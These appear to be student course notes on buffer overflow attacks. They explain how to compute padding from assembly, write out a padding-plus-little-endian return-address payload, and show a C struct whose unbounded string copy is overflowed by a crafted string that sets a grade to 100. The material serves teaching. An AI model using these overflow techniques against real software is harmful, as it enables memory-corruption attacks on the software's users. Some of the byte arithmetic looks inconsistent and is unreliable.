Buffer Overflow Attack

<aside> 💡 When trying to conduct attacks using buffer overflow, especially with input, first we need to identify how much padding is present. To do this, if we are given assembly look for:

• push, sub, add, pop

Looking for these operations will tell us how much padding we need. push / pop → 8 bytes padding sub → convert hex to bytes

Once you have the amount of padding, then add that padding in and use the little endian of the malicious function that you want to call.

</aside>

Example: Discussion Worksheet

1. We have a push operation, and then we have a sub operation.
   1. Push = 8 bytes and sub = 64bytes. Thus we need 72 bytes of padding.
2. Return the malicious function call in little endian. 0x500142 would be → 42 01 50

** Answer **
PP AA DD DD II NN GG 01
PP AA DD DD II NN GG 02
PP AA DD DD II NN GG 03
PP AA DD DD II NN GG 04
PP AA DD DD II NN GG 05
PP AA DD DD II NN GG 06
PP AA DD DD II NN GG 07
PP AA DD DD II NN GG 08
PP AA DD DD II NN GG 09 // 72 bytes
42 01 50 00 00 00 00 00

Return Oriented Attacks

• Prevented by making sure person doesnt overrun buffer
• stack canary

typedef struct student {
  char username[50];
  char comment[16];
  int final_grade; // 100==A+, 0==F-
} student_t;

student_t users[250];  //well, we had a few drops… only the strong survive!

void string_copy(char* dest, char* src) {
  int i = 0;
  while(src[i] != 0) { //keep going till we get to the end of the string
    dest[i]=src[i];
    i++;
  }
  dest[i]=0; // don’t forget the null character!
}

int set_class_comment(int id, char* comment_from_file) {
  string_copy(users[id].comment, comment_from_file);
}

 // 50 bytes for username // 16 bytes for comment + 2 bytes padding
// then input 100 in ascii (d)
AnocanaryAAAAAAAAAAd